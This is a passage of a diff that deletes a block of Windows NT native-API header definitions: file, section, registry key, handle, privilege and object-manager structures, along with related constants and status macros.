- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;
-
-typedef struct _FILE_LINKS_INFORMATION {
- ULONG BytesNeeded;
- ULONG EntriesReturned;
- FILE_LINK_ENTRY_INFORMATION Entry;
-} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;
-
-typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;
-
-typedef struct 
_FILE_STANDARD_LINK_INFORMATION { - ULONG NumberOfAccessibleLinks; - ULONG TotalNumberOfLinks; - BOOLEAN DeletePending; - BOOLEAN Directory; -} FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION; - -typedef struct _FILE_SFIO_RESERVE_INFORMATION { - ULONG RequestsPerPeriod; - ULONG Period; - BOOLEAN RetryFailures; - BOOLEAN Discardable; - ULONG RequestSize; - ULONG NumOutstandingRequests; -} FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION; - -typedef struct _FILE_SFIO_VOLUME_INFORMATION { - ULONG MaximumRequestsPerPeriod; - ULONG MinimumPeriod; - ULONG MinimumTransferSize; -} FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION; - -// -// Define the flags for NtSet(Query)EaFile service structure entries -// - -#define FILE_NEED_EA 0x00000080 - -// -// Define EA type values -// - -#define FILE_EA_TYPE_BINARY 0xfffe -#define FILE_EA_TYPE_ASCII 0xfffd -#define FILE_EA_TYPE_BITMAP 0xfffb -#define FILE_EA_TYPE_METAFILE 0xfffa -#define FILE_EA_TYPE_ICON 0xfff9 -#define FILE_EA_TYPE_EA 0xffee -#define FILE_EA_TYPE_MVMT 0xffdf -#define FILE_EA_TYPE_MVST 0xffde -#define FILE_EA_TYPE_ASN1 0xffdd -#define FILE_EA_TYPE_FAMILY_IDS 0xff01 - -typedef struct _FILE_FULL_EA_INFORMATION { - ULONG NextEntryOffset; - UCHAR Flags; - UCHAR EaNameLength; - USHORT EaValueLength; - CHAR EaName[1]; -} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; - -typedef struct _FILE_GET_EA_INFORMATION { - ULONG NextEntryOffset; - UCHAR EaNameLength; - CHAR EaName[1]; -} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; - -typedef struct _FILE_GET_QUOTA_INFORMATION { - ULONG NextEntryOffset; - ULONG SidLength; - SID Sid; -} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; - -typedef struct _FILE_QUOTA_INFORMATION { - ULONG NextEntryOffset; - ULONG SidLength; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER QuotaUsed; - LARGE_INTEGER QuotaThreshold; - LARGE_INTEGER QuotaLimit; - SID Sid; -} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; - -typedef struct 
_FILE_DIRECTORY_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG FileAttributes; - ULONG FileNameLength; - WCHAR FileName[1]; -} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; - -typedef struct _FILE_FULL_DIR_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG FileAttributes; - ULONG FileNameLength; - ULONG EaSize; - WCHAR FileName[1]; -} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; - -typedef struct _FILE_ID_FULL_DIR_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG FileAttributes; - ULONG FileNameLength; - ULONG EaSize; - LARGE_INTEGER FileId; - WCHAR FileName[1]; -} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; - -typedef struct _FILE_BOTH_DIR_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG FileAttributes; - ULONG FileNameLength; - ULONG EaSize; - CCHAR ShortNameLength; - WCHAR ShortName[12]; - WCHAR FileName[1]; -} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION; - -typedef struct _FILE_ID_BOTH_DIR_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG 
FileAttributes; - ULONG FileNameLength; - ULONG EaSize; - CCHAR ShortNameLength; - WCHAR ShortName[12]; - LARGE_INTEGER FileId; - WCHAR FileName[1]; -} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; - -typedef struct _FILE_NAMES_INFORMATION { - ULONG NextEntryOffset; - ULONG FileIndex; - ULONG FileNameLength; - WCHAR FileName[1]; -} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; - -typedef struct _FILE_OBJECTID_INFORMATION { - LONGLONG FileReference; - UCHAR ObjectId[16]; - union { - struct { - UCHAR BirthVolumeId[16]; - UCHAR BirthObjectId[16]; - UCHAR DomainId[16]; - }; - UCHAR ExtendedInfo[48]; - }; -} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; - -typedef struct _FILE_FS_VOLUME_INFORMATION { - LARGE_INTEGER VolumeCreationTime; - ULONG VolumeSerialNumber; - ULONG VolumeLabelLength; - BOOLEAN SupportsObjects; - WCHAR VolumeLabel[1]; -} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION; - -typedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION -{ - ULONG NextEntryOffset; - ULONG FileIndex; - LARGE_INTEGER CreationTime; - LARGE_INTEGER LastAccessTime; - LARGE_INTEGER LastWriteTime; - LARGE_INTEGER ChangeTime; - LARGE_INTEGER EndOfFile; - LARGE_INTEGER AllocationSize; - ULONG FileAttributes; - ULONG FileNameLength; - LARGE_INTEGER FileId; - GUID LockingTransactionId; - ULONG TxInfoFlags; - WCHAR FileName[1]; -} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION; - -/* -** File END -*/ - -/* -** Section START -*/ - -typedef enum _SECTION_INFORMATION_CLASS { - SectionBasicInformation, - SectionImageInformation, - SectionRelocationInformation, - SectionOriginalBaseInformation, - SectionInternalImageInformation, - MaxSectionInfoClass -} SECTION_INFORMATION_CLASS; - -typedef struct _SECTION_BASIC_INFO { - PVOID BaseAddress; - ULONG AllocationAttributes; - LARGE_INTEGER MaximumSize; -} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION; - -typedef struct _SECTION_IMAGE_INFORMATION { - PVOID TransferAddress; - ULONG 
ZeroBits; - SIZE_T MaximumStackSize; - SIZE_T CommittedStackSize; - ULONG SubSystemType; - union { - struct { - USHORT SubSystemMinorVersion; - USHORT SubSystemMajorVersion; - }; - ULONG SubSystemVersion; - }; - union - { - struct - { - USHORT MajorOperatingSystemVersion; - USHORT MinorOperatingSystemVersion; - }; - ULONG OperatingSystemVersion; - }; - USHORT ImageCharacteristics; - USHORT DllCharacteristics; - USHORT Machine; - BOOLEAN ImageContainsCode; - union - { - UCHAR ImageFlags; - struct - { - UCHAR ComPlusNativeReady : 1; - UCHAR ComPlusILOnly : 1; - UCHAR ImageDynamicallyRelocated : 1; - UCHAR ImageMappedFlat : 1; - UCHAR BaseBelow4gb : 1; - UCHAR ComPlusPrefer32bit : 1; - UCHAR Reserved : 2; - }; - }; - ULONG LoaderFlags; - ULONG ImageFileSize; - ULONG CheckSum; -} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; - -typedef struct _SECTION_IMAGE_INFORMATION64 { - ULONGLONG TransferAddress; - ULONG ZeroBits; - ULONGLONG MaximumStackSize; - ULONGLONG CommittedStackSize; - ULONG SubSystemType; - union { - struct { - USHORT SubSystemMinorVersion; - USHORT SubSystemMajorVersion; - }; - ULONG SubSystemVersion; - }; - union - { - struct - { - USHORT MajorOperatingSystemVersion; - USHORT MinorOperatingSystemVersion; - }; - ULONG OperatingSystemVersion; - }; - USHORT ImageCharacteristics; - USHORT DllCharacteristics; - USHORT Machine; - BOOLEAN ImageContainsCode; - union - { - UCHAR ImageFlags; - struct - { - UCHAR ComPlusNativeReady : 1; - UCHAR ComPlusILOnly : 1; - UCHAR ImageDynamicallyRelocated : 1; - UCHAR ImageMappedFlat : 1; - UCHAR BaseBelow4gb : 1; - UCHAR ComPlusPrefer32bit : 1; - UCHAR Reserved : 2; - }; - }; - ULONG LoaderFlags; - ULONG ImageFileSize; - ULONG CheckSum; -} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64; - -typedef struct _SECTION_INTERNAL_IMAGE_INFORMATION { - SECTION_IMAGE_INFORMATION SectionInformation; - union - { - ULONG ExtendedFlags; - struct - { - ULONG ImageExportSuppressionEnabled : 1; - ULONG Reserved : 31; 
- }; - }; -} SECTION_INTERNAL_IMAGE_INFORMATION, *PSECTION_INTERNAL_IMAGE_INFORMATION; - -typedef enum _SECTION_INHERIT { - ViewShare = 1, - ViewUnmap = 2 -} SECTION_INHERIT; - -#ifndef SEC_BASED -#define SEC_BASED 0x200000 -#endif - -#ifndef SEC_NO_IMAGE -#define SEC_NO_CHANGE 0x400000 -#endif - -#ifndef SEC_FILE -#define SEC_FILE 0x800000 -#endif - -#ifndef SEC_IMAGE -#define SEC_IMAGE 0x1000000 -#endif - -#ifndef SEC_RESERVE -#define SEC_RESERVE 0x4000000 -#endif - -#ifndef SEC_COMMIT -#define SEC_COMMIT 0x8000000 -#endif - -#ifndef SEC_NOCACHE -#define SEC_NOCACHE 0x10000000 -#endif - -#ifndef SEC_GLOBAL -#define SEC_GLOBAL 0x20000000 -#endif - -#ifndef SEC_LARGE_PAGES -#define SEC_LARGE_PAGES 0x80000000 -#endif - -/* -** Section END -*/ - -/* -** System Table START -*/ -#define NUMBER_SERVICE_TABLES 2 -#define NTOS_SERVICE_INDEX 0 -#define WIN32K_SERVICE_INDEX 1 -#define SERVICE_NUMBER_MASK ((1 << 12) - 1) - -#if defined(_WIN64) - -#if defined(_AMD64_) - -#define SERVICE_TABLE_SHIFT (12 - 4) -#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) -#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) - -#else - -#define SERVICE_TABLE_SHIFT (12 - 5) -#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5) -#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5) - -#endif - -#else - -#define SERVICE_TABLE_SHIFT (12 - 4) -#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4) -#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4) - -#endif - -typedef struct _KSERVICE_TABLE_DESCRIPTOR { - ULONG_PTR Base; //e.g. KiServiceTable - PULONG Count; - ULONG Limit;//e.g. KiServiceLimit - PUCHAR Number; //e.g. 
KiArgumentTable -} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR; -/* -** System Table END -*/ - -/* -** System Boot Environment START -*/ - -// Size=20 -typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 { - struct _GUID BootIdentifier; - enum _FIRMWARE_TYPE FirmwareType; -} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1; - -// Size=32 -typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION { - struct _GUID BootIdentifier; - enum _FIRMWARE_TYPE FirmwareType; - unsigned __int64 BootFlags; -} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION; - -/* -** System Boot Environment END -*/ - -/* -** Key START -*/ - -typedef enum _KEY_INFORMATION_CLASS { - KeyBasicInformation, - KeyNodeInformation, - KeyFullInformation, - KeyNameInformation, - KeyCachedInformation, - KeyFlagsInformation, - KeyVirtualizationInformation, - KeyHandleTagsInformation, - KeyTrustInformation, - KeyLayerInformation, - MaxKeyInfoClass -} KEY_INFORMATION_CLASS; - -typedef enum _KEY_SET_INFORMATION_CLASS { - KeyWriteTimeInformation, - KeyWow64FlagsInformation, - KeyControlFlagsInformation, - KeySetVirtualizationInformation, - KeySetDebugInformation, - KeySetHandleTagsInformation, - KeySetLayerInformation, - MaxKeySetInfoClass -} KEY_SET_INFORMATION_CLASS; - -typedef struct _KEY_FULL_INFORMATION { - LARGE_INTEGER LastWriteTime; - ULONG TitleIndex; - ULONG ClassOffset; - ULONG ClassLength; - ULONG SubKeys; - ULONG MaxNameLen; - ULONG MaxClassLen; - ULONG Values; - ULONG MaxValueNameLen; - ULONG MaxValueDataLen; - WCHAR Class[1]; -} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; - -typedef struct _KEY_BASIC_INFORMATION { - LARGE_INTEGER LastWriteTime; - ULONG TitleIndex; - ULONG NameLength; - WCHAR Name[1]; -} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; - -typedef enum _KEY_VALUE_INFORMATION_CLASS { - KeyValueBasicInformation, - KeyValueFullInformation, - KeyValuePartialInformation, - KeyValueFullInformationAlign64, - 
KeyValuePartialInformationAlign64, - KeyValueLayerInformation, - MaxKeyValueInfoClass -} KEY_VALUE_INFORMATION_CLASS; - -typedef struct _KEY_VALUE_BASIC_INFORMATION { - ULONG TitleIndex; - ULONG Type; - ULONG NameLength; - WCHAR Name[1]; // Variable size -} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION; - -typedef struct _KEY_VALUE_FULL_INFORMATION { - ULONG TitleIndex; - ULONG Type; - ULONG DataOffset; - ULONG DataLength; - ULONG NameLength; - WCHAR Name[1]; // Variable size - // Data[1]; // Variable size data not declared -} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; - -typedef struct _KEY_VALUE_PARTIAL_INFORMATION { - ULONG TitleIndex; - ULONG Type; - ULONG DataLength; - UCHAR Data[1]; // Variable size -} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; - -typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 { - ULONG Type; - ULONG DataLength; - UCHAR Data[1]; // Variable size -} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64; - -typedef struct _KEY_VALUE_ENTRY { - PUNICODE_STRING ValueName; - ULONG DataLength; - ULONG DataOffset; - ULONG Type; -} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY; - -/* -** Key END -*/ - - -/* -** TIME_FIELDS START -*/ - -typedef struct _TIME_FIELDS { - CSHORT Year; // range [1601...] 
- CSHORT Month; // range [1..12] - CSHORT Day; // range [1..31] - CSHORT Hour; // range [0..23] - CSHORT Minute; // range [0..59] - CSHORT Second; // range [0..59] - CSHORT Milliseconds;// range [0..999] - CSHORT Weekday; // range [0..6] == [Sunday..Saturday] -} TIME_FIELDS; -typedef TIME_FIELDS *PTIME_FIELDS; - -/* -** TIME_FIELDS END -*/ - -/* -** HANDLE START -*/ - -typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { - USHORT UniqueProcessId; - USHORT CreatorBackTraceIndex; - UCHAR ObjectTypeIndex; - UCHAR HandleAttributes; - USHORT HandleValue; - PVOID Object; - ULONG GrantedAccess; -} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; - -typedef struct _SYSTEM_HANDLE_INFORMATION { - ULONG NumberOfHandles; - SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; -} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; - -typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { - PVOID Object; - ULONG_PTR UniqueProcessId; - ULONG_PTR HandleValue; - ULONG GrantedAccess; - USHORT CreatorBackTraceIndex; - USHORT ObjectTypeIndex; - ULONG HandleAttributes; - ULONG Reserved; -} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; - -typedef struct _SYSTEM_HANDLE_INFORMATION_EX { - ULONG_PTR NumberOfHandles; - ULONG_PTR Reserved; - SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; -} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX; - -/* -** HANDLE END -*/ - -// Privileges - -#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L) -#define SE_CREATE_TOKEN_PRIVILEGE (2L) -#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L) -#define SE_LOCK_MEMORY_PRIVILEGE (4L) -#define SE_INCREASE_QUOTA_PRIVILEGE (5L) -#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L) -#define SE_TCB_PRIVILEGE (7L) -#define SE_SECURITY_PRIVILEGE (8L) -#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L) -#define SE_LOAD_DRIVER_PRIVILEGE (10L) -#define SE_SYSTEM_PROFILE_PRIVILEGE (11L) -#define SE_SYSTEMTIME_PRIVILEGE (12L) -#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L) -#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L) 
-#define SE_CREATE_PAGEFILE_PRIVILEGE (15L) -#define SE_CREATE_PERMANENT_PRIVILEGE (16L) -#define SE_BACKUP_PRIVILEGE (17L) -#define SE_RESTORE_PRIVILEGE (18L) -#define SE_SHUTDOWN_PRIVILEGE (19L) -#define SE_DEBUG_PRIVILEGE (20L) -#define SE_AUDIT_PRIVILEGE (21L) -#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L) -#define SE_CHANGE_NOTIFY_PRIVILEGE (23L) -#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L) -#define SE_UNDOCK_PRIVILEGE (25L) -#define SE_SYNC_AGENT_PRIVILEGE (26L) -#define SE_ENABLE_DELEGATION_PRIVILEGE (27L) -#define SE_MANAGE_VOLUME_PRIVILEGE (28L) -#define SE_IMPERSONATE_PRIVILEGE (29L) -#define SE_CREATE_GLOBAL_PRIVILEGE (30L) -#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L) -#define SE_RELABEL_PRIVILEGE (32L) -#define SE_INC_WORKING_SET_PRIVILEGE (33L) -#define SE_TIME_ZONE_PRIVILEGE (34L) -#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L) -#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE - -// -// Generic test for success on any status value (non-negative numbers -// indicate success). -// - -#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) - -// -// Generic test for information on any status value. -// - -#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1) - -// -// Generic test for warning on any status value. -// - -#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2) - -// -// Generic test for error on any status value. 
-// - -#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3) - - -/* -** OBJECT MANAGER START -*/ - -// -// Header flags -// - -#define OB_FLAG_NEW_OBJECT 0x01 -#define OB_FLAG_KERNEL_OBJECT 0x02 -#define OB_FLAG_CREATOR_INFO 0x04 -#define OB_FLAG_EXCLUSIVE_OBJECT 0x08 -#define OB_FLAG_PERMANENT_OBJECT 0x10 -#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20 -#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40 -#define OB_FLAG_DELETED_INLINE 0x80 - -// -// InfoMask values -// - -#define OB_INFOMASK_PROCESS_INFO 0x10 -#define OB_INFOMASK_QUOTA 0x08 -#define OB_INFOMASK_HANDLE 0x04 -#define OB_INFOMASK_NAME 0x02 -#define OB_INFOMASK_CREATOR_INFO 0x01 - -#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF -#define NUMBER_HASH_BUCKETS 37 - -typedef struct _OBJECT_DIRECTORY_ENTRY { - PVOID ChainLink; - PVOID Object; - ULONG HashValue; -} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY; - -typedef struct _EX_PUSH_LOCK { - union - { - ULONG Locked : 1; - ULONG Waiting : 1; - ULONG Waking : 1; - ULONG MultipleShared : 1; - ULONG Shared : 28; - ULONG Value; - PVOID Ptr; - }; -} EX_PUSH_LOCK, *PEX_PUSH_LOCK; - -typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE { - LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS]; - EX_PUSH_LOCK Lock; - ULONG NumberOfPrivateSpaces; -} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE; - -typedef struct _OBJECT_NAMESPACE_ENTRY { - LIST_ENTRY ListEntry; - PVOID NamespaceRootDirectory; - ULONG SizeOfBoundaryInformation; - ULONG Reserved; - UCHAR HashValue; - ULONG_PTR Alignment; -} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY; - -typedef enum _BOUNDARY_ENTRY_TYPE { - OBNS_Invalid = 0, - OBNS_Name = 1, - OBNS_SID = 2, - OBNS_IntegrityLabel = 3 -} BOUNDARY_ENTRY_TYPE; - -typedef struct _OBJECT_BOUNDARY_ENTRY { - BOUNDARY_ENTRY_TYPE EntryType; - ULONG EntrySize; -} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY; - -typedef struct _OBJECT_BOUNDARY_DESCRIPTOR { - ULONG Version; - ULONG Items; - ULONG TotalSize; - ULONG Reserved; -} OBJECT_BOUNDARY_DESCRIPTOR, 
*POBJECT_BOUNDARY_DESCRIPTOR; - -typedef struct _OBJECT_DIRECTORY { - POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS]; - EX_PUSH_LOCK Lock; - PDEVICE_MAP DeviceMap; - ULONG SessionId; - PVOID NamespaceEntry; - ULONG Flags; -} OBJECT_DIRECTORY, *POBJECT_DIRECTORY; - -typedef struct _OBJECT_DIRECTORY_V2 { - POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS]; - EX_PUSH_LOCK Lock; - PDEVICE_MAP DeviceMap; - POBJECT_DIRECTORY ShadowDirectory; - ULONG SessionId; - PVOID NamespaceEntry; - ULONG Flags; - LONG Padding[1]; -} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2; - -typedef struct _OBJECT_DIRECTORY_V3 { - POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS]; - EX_PUSH_LOCK Lock; - PDEVICE_MAP DeviceMap; - POBJECT_DIRECTORY ShadowDirectory; - PVOID NamespaceEntry; - PVOID SessionObject; - ULONG Flags; - ULONG SessionId; -} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3; - -typedef struct _OBJECT_HEADER_NAME_INFO { - POBJECT_DIRECTORY Directory; - UNICODE_STRING Name; - ULONG QueryReferences; -} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO; - -typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32 - LIST_ENTRY TypeList; // Size=16 Offset=0 - PVOID CreatorUniqueProcess; // Size=8 Offset=16 - USHORT CreatorBackTraceIndex; // Size=2 Offset=24 - USHORT Reserved; // Size=2 Offset=26 -} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO; - -typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16 - PVOID Process; // Size=8 Offset=0 - struct - { - unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24 - unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8 - }; -} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY; - -typedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16 - union { - PVOID HandleCountDataBase; // Size=8 Offset=0 - struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0 - }; -} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO; - -typedef struct _OBJECT_HEADER_PROCESS_INFO { // 
Size=16 - PVOID ExclusiveProcess; // Size=8 Offset=0 - PVOID Reserved; // Size=8 Offset=8 -} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO; - -typedef struct _OBJECT_HEADER_QUOTA_INFO { - ULONG PagedPoolCharge; //4 - ULONG NonPagedPoolCharge; //4 - ULONG SecurityDescriptorCharge; //4 - PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer) - unsigned __int64 Reserved; //sizeof(uint64) -} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO; - -typedef struct _OBJECT_HEADER_PADDING_INFO { - ULONG PaddingAmount; -} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO; - -typedef struct _OBJECT_HEADER_AUDIT_INFO { - PVOID SecurityDescriptor; - PVOID Reserved; -} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO; - -typedef struct _OBJECT_HEADER_EXTENDED_INFO { - struct _OBJECT_FOOTER *Footer; - PVOID Reserved; -} OBJECT_HEADER_EXTENDED_INFO, POBJECT_HEADER_EXTENDED_INFO; - -typedef struct _OB_HANDLE_REVOCATION_BLOCK -{ - LIST_ENTRY RevocationInfos; - struct _EX_PUSH_LOCK Lock; - struct _EX_RUNDOWN_REF Rundown; -} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK; - -typedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO { - LIST_ENTRY ListEntry; - OB_HANDLE_REVOCATION_BLOCK* RevocationBlock; - unsigned char Padding1[4]; - unsigned char Padding2[4]; -} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO; - -typedef struct _QUAD { - union { - INT64 UseThisFieldToCopy; - float DoNotUseThisField; - }; -} QUAD, *PQUAD; - -typedef struct _OBJECT_CREATE_INFORMATION { - ULONG Attributes; - PVOID RootDirectory; - CHAR ProbeMode; - ULONG PagedPoolCharge; - ULONG NonPagedPoolCharge; - ULONG SecurityDescriptorCharge; - PVOID SecurityDescriptor; - PSECURITY_QUALITY_OF_SERVICE SecurityQos; - SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; -} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION; - -typedef struct _SECURITY_CLIENT_CONTEXT { - struct _SECURITY_QUALITY_OF_SERVICE SecurityQos; - void* ClientToken; - UCHAR 
DirectlyAccessClientToken; - UCHAR DirectAccessEffectiveOnly; - UCHAR ServerIsRemote; - struct _TOKEN_CONTROL ClientTokenControl; - LONG __PADDING__[1]; -} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT; - -typedef enum _POOL_TYPE { - NonPagedPool, - NonPagedPoolExecute = NonPagedPool, - PagedPool, - NonPagedPoolMustSucceed = NonPagedPool + 2, - DontUseThisType, - NonPagedPoolCacheAligned = NonPagedPool + 4, - PagedPoolCacheAligned, - NonPagedPoolCacheAlignedMustS = NonPagedPool + 6, - MaxPoolType, - NonPagedPoolBase = 0, - NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2, - NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4, - NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6, - NonPagedPoolSession = 32, - PagedPoolSession = NonPagedPoolSession + 1, - NonPagedPoolMustSucceedSession = PagedPoolSession + 1, - DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1, - NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1, - PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1, - NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1, - NonPagedPoolNx = 512, - NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4, - NonPagedPoolSessionNx = NonPagedPoolNx + 32 -} POOL_TYPE; - -// -// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant. 
